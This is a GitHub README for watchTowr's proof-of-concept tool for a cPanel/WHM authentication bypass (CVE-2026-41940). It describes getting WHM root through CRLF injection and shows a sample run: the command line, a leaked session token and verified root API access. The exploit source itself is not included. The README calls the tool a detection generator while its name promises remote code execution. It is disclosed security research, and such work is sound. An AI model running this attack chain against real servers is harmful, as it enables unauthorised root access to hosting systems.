watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

GitHub: watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

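Proof-of-concept exploit tool for the cPanel/WHM authentication bypass vulnerability (CVE-2026-41940). It bypasses authentication via CRLF injection and obtains WHM root privileges to achieve remote code execution.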

Stars: 198 | Forks: 45

# cve-2026-41940 cPanel/WHM Authentication Bypass - Detection Artifact Generator

cPanel/WHM Authentication Bypass Detection Artifact Generator tool

# Description

This detection artifact generator is used to verify whether a cPanel/WHM instance is affected by the [recently](https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026) disclosed authentication bypass vulnerability.

# Detection in Action

Running against a vulnerable instance:

```
python authbypass-RCE.py --target https://target:2087/
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py
        (*) cPanel/WHM Authentication Bypass - Detection Artifact Generator
          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
        CVEs: [CVE-2026-Pending]

[0] hostname = 
[1] minting a preauth session...
    session base = :vQ2WC5Bexp0oFSa7
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess5691070609
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200
    {"version":"11.110.0.89"}
```

# Affected Versions

See the official cPanel site [here](https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026).

# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research, follow the [watchTowr](https://watchTowr.com) Labs team:

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber